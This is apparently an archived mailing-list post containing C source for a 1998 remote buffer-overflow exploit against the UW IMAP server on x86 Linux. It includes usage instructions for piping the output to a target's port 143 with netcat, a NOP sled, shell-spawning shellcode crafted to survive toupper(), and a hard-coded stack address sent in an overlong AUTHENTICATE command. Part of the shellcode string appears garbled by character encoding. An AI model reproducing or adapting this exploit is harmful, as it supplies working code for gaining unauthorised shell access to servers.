/* UW Imap remote exploit for x86Linux by Juan A. Fernández Jiménez (carlosfdezat_private) Systems affect: Ummm...I only tested it in IMAP4rev1v10.203 Greetz to: Koji, Sud, Darkmoon, Marneus, NBH Group ... How to use: # (./imaplinux;cat) | nc target_host 143 Note: This exploit is based in the remote exploit created by Cheez Whiz. You feel free to change the nops,offsets and esp...the shellcode is all original from me... :P ...no problems with toupper() ESP=0xBFFFF04C for v10.203 22/07/98 23:26 */ #define BUF 2048 #define NOP 0x90 char shellcode[]= "\xeb\x33\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x80\x46" "\x01\x80\x80\x46\x02\x80\x80\x46\x03\x80\x80\x46\x05\x80\x80\x46" "\x06\x80\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xc8\xff\xff\xff/âéî/óč........."; char buffer[BUF]; long int nop=422,esp=0xBFFFF04C,offset=100; void main() { int cont; memset(buffer,NOP,sizeof(buffer)); memcpy(buffer+nop,shellcode,strlen(shellcode)); for(cont=nop+strlen(shellcode);cont < BUF-4;cont+=4) *((int *) &buffer[cont])=esp+offset; printf("* AUTHENTICATE {%d}\r\n",BUF); for(cont=0;cont<sizeof(buffer);cont++) putchar(buffer[cont]); printf("\r\n"); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:07:30 PDT